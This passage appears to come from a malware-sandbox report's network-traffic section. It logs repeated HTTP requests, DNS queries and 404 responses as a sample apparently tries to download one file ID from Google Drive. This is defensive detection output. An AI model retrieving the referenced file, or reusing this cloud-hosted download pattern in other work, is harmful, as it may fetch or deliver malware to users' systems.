      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXUdQ-gSJtroZqw5zw6RaJ4OchFfrKYDwi5vJjFD6OF2m8DHNJH0_2GPXoIOxNGpYYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-a15_tYGTfByt35S0CAjxlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA; expires=Sun, 13-Jul-2025 02:52:31 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC49DtT0F5CMiwKmH3o6B4pfBMElBHuGUKMjjyPhhOHQO_aeDiyjQOwWZwEEdbYyIRIvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-oWpfUiVCRk5qqBgeCySB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTbs1P9oRgujbOEyJ3yx0iW3l913ZP37ugmvoLSTeUuYUTdGSfrEsqF5tVok1XkqdRPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-W0pOL_5HAhjlq32MQY2aFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSGhacbtpB3ODSnNKll6IKbOlCgw_V5bboHw9rAYJI8PoOsLEy-fe6Yc6vZXFZTJK9HNYyDZ40Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-woyzqQFrcQnuiPGGGptLZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6KCOiy9RgdqzvIzD9vNkapPiokd7Z8kQibYYOHk8djs0BqkkEy46z0qDNanPr4DWBUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:40 GMTContent-Security-Policy: script-src 'nonce-y1hjgZyHL2DExuSUYHqAzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox 